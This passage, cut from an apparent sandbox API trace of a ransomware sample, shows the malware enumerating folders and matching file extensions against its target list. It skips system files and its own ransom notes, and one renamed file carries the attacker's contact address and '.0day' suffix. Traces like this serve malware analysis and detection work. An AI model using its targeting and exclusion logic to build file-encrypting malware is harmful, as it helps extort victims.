returned -1 [0265.339] lstrlenW (lpString=".aspx") returned 5 [0265.339] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0265.339] lstrlenW (lpString=".asr") returned 4 [0265.339] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".asx") returned 4 [0265.339] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".avi") returned 4 [0265.339] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".avs") returned 4 [0265.339] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".backup") returned 7 [0265.339] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0265.339] lstrlenW (lpString=".bak") returned 4 [0265.339] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".bay") returned 4 [0265.339] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".bd") returned 3 [0265.339] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0265.339] lstrlenW (lpString=".bin") returned 4 [0265.339] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".bmp") returned 4 [0265.339] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".bz2") returned 4 [0265.340] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".c") returned 2 [0265.340] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0265.340] lstrlenW (lpString=".cdr") returned 4 [0265.340] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cer") returned 4 [0265.340] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cf") returned 3 [0265.340] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0265.340] lstrlenW (lpString=".cfc") returned 4 [0265.340] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cfm") returned 4 [0265.340] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cfml") returned 5 [0265.340] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0265.340] lstrlenW (lpString=".cfu") returned 4 [0265.340] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".chm") returned 4 [0265.340] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cin") returned 4 [0265.340] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".class") returned 6 [0265.340] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0265.340] lstrlenW (lpString=".clx") returned 4 [0265.340] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".config") returned 7 [0265.340] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0265.340] lstrlenW (lpString=".cpp") returned 4 [0265.340] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".cr2") returned 4 [0265.340] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".crt") returned 4 [0265.340] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0265.340] lstrlenW (lpString=".crw") returned 4 [0265.340] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".cs") returned 3 [0265.341] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0265.341] lstrlenW (lpString=".css") returned 4 [0265.341] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".csv") returned 4 [0265.341] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".cub") returned 4 [0265.341] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dae") returned 4 [0265.341] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dat") returned 4 [0265.341] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".db") returned 3 [0265.341] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0265.341] lstrlenW (lpString=".dbf") returned 4 [0265.341] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dbx") returned 4 [0265.341] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dc3") returned 4 [0265.341] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dcm") returned 4 [0265.341] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dcr") returned 4 [0265.341] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".der") returned 4 [0265.341] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dib") returned 4 [0265.341] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dic") returned 4 [0265.341] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".dif") returned 4 [0265.341] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0265.341] lstrlenW (lpString=".divx") returned 5 [0265.341] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0265.341] lstrlenW (lpString=".djvu") returned 5 [0265.341] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".dng") returned 4 [0265.342] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".doc") returned 4 [0265.342] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".docm") returned 5 [0265.342] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".docx") returned 5 [0265.342] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".dot") returned 4 [0265.342] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dotm") returned 5 [0265.342] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".dotx") returned 5 [0265.342] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".dpx") returned 4 [0265.342] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dqy") returned 4 [0265.342] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dsn") returned 4 [0265.342] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dt") returned 3 [0265.342] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0265.342] lstrlenW (lpString=".dtd") returned 4 [0265.342] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dwg") returned 4 [0265.342] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dwt") returned 4 [0265.342] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".dx") returned 3 [0265.342] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0265.342] lstrlenW (lpString=".dxf") returned 4 [0265.342] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0265.342] lstrlenW (lpString=".edml") returned 5 [0265.342] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0265.342] lstrlenW (lpString=".efd") returned 4 [0265.342] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".elf") returned 4 [0265.343] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".emf") returned 4 [0265.343] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".emz") returned 4 [0265.343] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".epf") returned 4 [0265.343] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".eps") returned 4 [0265.343] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".epsf") returned 5 [0265.343] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0265.343] lstrlenW (lpString=".epsp") returned 5 [0265.343] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0265.343] lstrlenW (lpString=".erf") returned 4 [0265.343] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".exr") returned 4 [0265.343] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".f4v") returned 4 [0265.343] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".fido") returned 5 [0265.343] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0265.343] lstrlenW (lpString=".flm") returned 4 [0265.343] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".flv") returned 4 [0265.343] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".frm") returned 4 [0265.343] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".fxg") returned 4 [0265.343] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".geo") returned 4 [0265.343] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".gif") returned 4 [0265.343] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0265.343] lstrlenW (lpString=".grs") returned 4 [0265.343] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".gz") returned 3 [0265.344] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0265.344] lstrlenW (lpString=".h") returned 2 [0265.344] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0265.344] lstrlenW (lpString=".hdr") returned 4 [0265.344] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".hpp") returned 4 [0265.344] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".hta") returned 4 [0265.344] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".htc") returned 4 [0265.344] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".htm") returned 4 [0265.344] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".html") returned 5 [0265.344] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0265.344] lstrlenW (lpString=".icb") returned 4 [0265.344] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".ics") returned 4 [0265.344] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".iff") returned 4 [0265.344] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".inc") returned 4 [0265.344] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0265.344] lstrlenW (lpString=".indd") returned 5 [0265.344] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0265.344] lstrlenW (lpString=".ini") returned 4 [0265.344] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0265.344] lstrlenW (lpString="desktop.ini") returned 11 [0265.344] lstrlenW (lpString=".0day") returned 5 [0265.344] lstrcmpiW (lpString1=".0day", lpString2="p.ini") returned -1 [0265.344] lstrlenW (lpString="desktop.ini") returned 11 [0265.344] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0265.344] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0265.344] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0265.344] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0265.345] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0265.345] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0265.345] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0265.345] lstrcmpiW (lpString1="agent1c.exe", lpString2="desktop.ini") returned -1 [0265.345] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.345] FindNextFileW (in: hFindFile=0x555b08, lpFindFileData=0x30ef808 | out: lpFindFileData=0x30ef808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xb0e938c0, ftCreationTime.dwHighDateTime=0x1d5246c, ftLastAccessTime.dwLowDateTime=0xb0e938c0, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xb0f2be40, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[my0day@aol.com].0day", cAlternateFileName="DESKTO~1.0DA")) returned 1 [0265.345] lstrlenW (lpString="desktop.ini.id-9C354B42.[my0day@aol.com].0day") returned 45 [0265.345] lstrlenW (lpString=".1cd") returned 4 [0265.345] lstrcmpiW (lpString1=".1cd", lpString2="0day") returned -1 [0265.345] lstrlenW (lpString=".3ds") returned 4 [0265.345] lstrcmpiW (lpString1=".3ds", lpString2="0day") returned -1 [0265.345] lstrlenW (lpString=".3fr") returned 4 [0265.345] lstrcmpiW (lpString1=".3fr", lpString2="0day") returned -1 [0265.345] lstrlenW (lpString=".3g2") returned 4 [0265.345] lstrcmpiW (lpString1=".3g2", lpString2="0day") returned -1 [0265.345] lstrlenW (lpString=".3gp") returned 4 [0265.345] lstrcmpiW (lpString1=".3gp", lpString2="0day") returned -1 [0265.345] lstrlenW (lpString=".7z") returned 3 [0265.345] lstrcmpiW (lpString1=".7z", lpString2="day") returned -1 [0265.345] lstrlenW (lpString=".accda") returned 6 [0265.345] lstrcmpiW (lpString1=".accda", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".accdb") returned 6 [0265.345] lstrcmpiW (lpString1=".accdb", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".accdc") returned 6 [0265.345] lstrcmpiW (lpString1=".accdc", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".accde") returned 6 [0265.345] lstrcmpiW (lpString1=".accde", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".accdt") returned 6 [0265.345] lstrcmpiW (lpString1=".accdt", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".accdw") returned 6 [0265.345] lstrcmpiW (lpString1=".accdw", lpString2="].0day") returned -1 [0265.345] lstrlenW (lpString=".adb") returned 4 [0265.346] lstrcmpiW (lpString1=".adb", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".adp") returned 4 [0265.346] lstrcmpiW (lpString1=".adp", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai") returned 3 [0265.346] lstrcmpiW (lpString1=".ai", lpString2="day") returned -1 [0265.346] lstrlenW (lpString=".ai3") returned 4 [0265.346] lstrcmpiW (lpString1=".ai3", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai4") returned 4 [0265.346] lstrcmpiW (lpString1=".ai4", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai5") returned 4 [0265.346] lstrcmpiW (lpString1=".ai5", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai6") returned 4 [0265.346] lstrcmpiW (lpString1=".ai6", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai7") returned 4 [0265.346] lstrcmpiW (lpString1=".ai7", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ai8") returned 4 [0265.346] lstrcmpiW (lpString1=".ai8", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".anim") returned 5 [0265.346] lstrcmpiW (lpString1=".anim", lpString2=".0day") returned 1 [0265.346] lstrlenW (lpString=".arw") returned 4 [0265.346] lstrcmpiW (lpString1=".arw", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".as") returned 3 [0265.346] lstrcmpiW (lpString1=".as", lpString2="day") returned -1 [0265.346] lstrlenW (lpString=".asa") returned 4 [0265.346] lstrcmpiW (lpString1=".asa", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".asc") returned 4 [0265.346] lstrcmpiW (lpString1=".asc", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".ascx") returned 5 [0265.346] lstrcmpiW (lpString1=".ascx", lpString2=".0day") returned 1 [0265.346] lstrlenW (lpString=".asm") returned 4 [0265.346] lstrcmpiW (lpString1=".asm", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".asmx") returned 5 [0265.346] lstrcmpiW (lpString1=".asmx", lpString2=".0day") returned 1 [0265.346] lstrlenW (lpString=".asp") returned 4 [0265.346] lstrcmpiW (lpString1=".asp", lpString2="0day") returned -1 [0265.346] lstrlenW (lpString=".aspx") returned 5 [0265.347] lstrcmpiW (lpString1=".aspx", lpString2=".0day") returned 1 [0265.347] lstrlenW (lpString=".asr") returned 4 [0265.347] lstrcmpiW (lpString1=".asr", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".asx") returned 4 [0265.347] lstrcmpiW (lpString1=".asx", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".avi") returned 4 [0265.347] lstrcmpiW (lpString1=".avi", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".avs") returned 4 [0265.347] lstrcmpiW (lpString1=".avs", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".backup") returned 7 [0265.347] lstrcmpiW (lpString1=".backup", lpString2="m].0day") returned -1 [0265.347] lstrlenW (lpString=".bak") returned 4 [0265.347] lstrcmpiW (lpString1=".bak", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".bay") returned 4 [0265.347] lstrcmpiW (lpString1=".bay", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".bd") returned 3 [0265.347] lstrcmpiW (lpString1=".bd", lpString2="day") returned -1 [0265.347] lstrlenW (lpString=".bin") returned 4 [0265.347] lstrcmpiW (lpString1=".bin", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".bmp") returned 4 [0265.347] lstrcmpiW (lpString1=".bmp", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".bz2") returned 4 [0265.347] lstrcmpiW (lpString1=".bz2", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".c") returned 2 [0265.347] lstrcmpiW (lpString1=".c", lpString2="ay") returned -1 [0265.347] lstrlenW (lpString=".cdr") returned 4 [0265.347] lstrcmpiW (lpString1=".cdr", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".cer") returned 4 [0265.347] lstrcmpiW (lpString1=".cer", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".cf") returned 3 [0265.347] lstrcmpiW (lpString1=".cf", lpString2="day") returned -1 [0265.347] lstrlenW (lpString=".cfc") returned 4 [0265.347] lstrcmpiW (lpString1=".cfc", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".cfm") returned 4 [0265.347] lstrcmpiW (lpString1=".cfm", lpString2="0day") returned -1 [0265.347] lstrlenW (lpString=".cfml") returned 5 [0265.348] lstrcmpiW (lpString1=".cfml", lpString2=".0day") returned 1 [0265.348] lstrlenW (lpString=".cfu") returned 4 [0265.348] lstrcmpiW (lpString1=".cfu", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".chm") returned 4 [0265.348] lstrcmpiW (lpString1=".chm", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".cin") returned 4 [0265.348] lstrcmpiW (lpString1=".cin", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".class") returned 6 [0265.348] lstrcmpiW (lpString1=".class", lpString2="].0day") returned -1 [0265.348] lstrlenW (lpString=".clx") returned 4 [0265.348] lstrcmpiW (lpString1=".clx", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".config") returned 7 [0265.348] lstrcmpiW (lpString1=".config", lpString2="m].0day") returned -1 [0265.348] lstrlenW (lpString=".cpp") returned 4 [0265.348] lstrcmpiW (lpString1=".cpp", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".cr2") returned 4 [0265.348] lstrcmpiW (lpString1=".cr2", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".crt") returned 4 [0265.348] lstrcmpiW (lpString1=".crt", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".crw") returned 4 [0265.348] lstrcmpiW (lpString1=".crw", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".cs") returned 3 [0265.348] lstrcmpiW (lpString1=".cs", lpString2="day") returned -1 [0265.348] lstrlenW (lpString=".css") returned 4 [0265.348] lstrcmpiW (lpString1=".css", lpString2="0day") returned -1 [0265.348] lstrlenW (lpString=".csv") returned 4 [0265.349] lstrcmpiW (lpString1=".csv", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".cub") returned 4 [0265.349] lstrcmpiW (lpString1=".cub", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dae") returned 4 [0265.349] lstrcmpiW (lpString1=".dae", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dat") returned 4 [0265.349] lstrcmpiW (lpString1=".dat", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".db") returned 3 [0265.349] lstrcmpiW (lpString1=".db", lpString2="day") returned -1 [0265.349] lstrlenW (lpString=".dbf") returned 4 [0265.349] lstrcmpiW (lpString1=".dbf", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dbx") returned 4 [0265.349] lstrcmpiW (lpString1=".dbx", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dc3") returned 4 [0265.349] lstrcmpiW (lpString1=".dc3", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dcm") returned 4 [0265.349] lstrcmpiW (lpString1=".dcm", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dcr") returned 4 [0265.349] lstrcmpiW (lpString1=".dcr", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".der") returned 4 [0265.349] lstrcmpiW (lpString1=".der", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dib") returned 4 [0265.349] lstrcmpiW (lpString1=".dib", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dic") returned 4 [0265.349] lstrcmpiW (lpString1=".dic", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".dif") returned 4 [0265.349] lstrcmpiW (lpString1=".dif", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".divx") returned 5 [0265.349] lstrcmpiW (lpString1=".divx", lpString2=".0day") returned 1 [0265.349] lstrlenW (lpString=".djvu") returned 5 [0265.349] lstrcmpiW (lpString1=".djvu", lpString2=".0day") returned 1 [0265.349] lstrlenW (lpString=".dng") returned 4 [0265.349] lstrcmpiW (lpString1=".dng", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".doc") returned 4 [0265.349] lstrcmpiW (lpString1=".doc", lpString2="0day") returned -1 [0265.349] lstrlenW (lpString=".docm") returned 5 [0265.350] lstrcmpiW (lpString1=".docm", lpString2=".0day") returned 1 [0265.350] lstrlenW (lpString=".docx") returned 5 [0265.350] lstrcmpiW (lpString1=".docx", lpString2=".0day") returned 1 [0265.350] lstrlenW (lpString=".dot") returned 4 [0265.350] lstrcmpiW (lpString1=".dot", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dotm") returned 5 [0265.350] lstrcmpiW (lpString1=".dotm", lpString2=".0day") returned 1 [0265.350] lstrlenW (lpString=".dotx") returned 5 [0265.350] lstrcmpiW (lpString1=".dotx", lpString2=".0day") returned 1 [0265.350] lstrlenW (lpString=".dpx") returned 4 [0265.350] lstrcmpiW (lpString1=".dpx", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dqy") returned 4 [0265.350] lstrcmpiW (lpString1=".dqy", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dsn") returned 4 [0265.350] lstrcmpiW (lpString1=".dsn", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dt") returned 3 [0265.350] lstrcmpiW (lpString1=".dt", lpString2="day") returned -1 [0265.350] lstrlenW (lpString=".dtd") returned 4 [0265.350] lstrcmpiW (lpString1=".dtd", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dwg") returned 4 [0265.350] lstrcmpiW (lpString1=".dwg", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dwt") returned 4 [0265.350] lstrcmpiW (lpString1=".dwt", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".dx") returned 3 [0265.350] lstrcmpiW (lpString1=".dx", lpString2="day") returned -1 [0265.350] lstrlenW (lpString=".dxf") returned 4 [0265.350] lstrcmpiW (lpString1=".dxf", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".edml") returned 5 [0265.350] lstrcmpiW (lpString1=".edml", lpString2=".0day") returned 1 [0265.350] lstrlenW (lpString=".efd") returned 4 [0265.350] lstrcmpiW (lpString1=".efd", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".elf") returned 4 [0265.350] lstrcmpiW (lpString1=".elf", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".emf") returned 4 [0265.350] lstrcmpiW (lpString1=".emf", lpString2="0day") returned -1 [0265.350] lstrlenW (lpString=".emz") returned 4 [0265.351] lstrcmpiW (lpString1=".emz", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".epf") returned 4 [0265.351] lstrcmpiW (lpString1=".epf", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".eps") returned 4 [0265.351] lstrcmpiW (lpString1=".eps", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".epsf") returned 5 [0265.351] lstrcmpiW (lpString1=".epsf", lpString2=".0day") returned 1 [0265.351] lstrlenW (lpString=".epsp") returned 5 [0265.351] lstrcmpiW (lpString1=".epsp", lpString2=".0day") returned 1 [0265.351] lstrlenW (lpString=".erf") returned 4 [0265.351] lstrcmpiW (lpString1=".erf", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".exr") returned 4 [0265.351] lstrcmpiW (lpString1=".exr", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".f4v") returned 4 [0265.351] lstrcmpiW (lpString1=".f4v", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".fido") returned 5 [0265.351] lstrcmpiW (lpString1=".fido", lpString2=".0day") returned 1 [0265.351] lstrlenW (lpString=".flm") returned 4 [0265.351] lstrcmpiW (lpString1=".flm", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".flv") returned 4 [0265.351] lstrcmpiW (lpString1=".flv", lpString2="0day") returned -1 [0265.351] lstrlenW (lpString=".frm") returned 4 [0265.351] lstrcmpiW (lpString1=".frm", lpString2="0day") returned -1 [0267.182] FindClose (in: hFindFile=0x3581100 | out: hFindFile=0x3581100) returned 1 [0267.182] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42c9068 | out: hHeap=0x4a0000) returned 1 [0267.182] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialOccasion", cAlternateFileName="SPECIA~1")) returned 1 [0267.182] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581100 [0267.184] FindNextFileW (in: 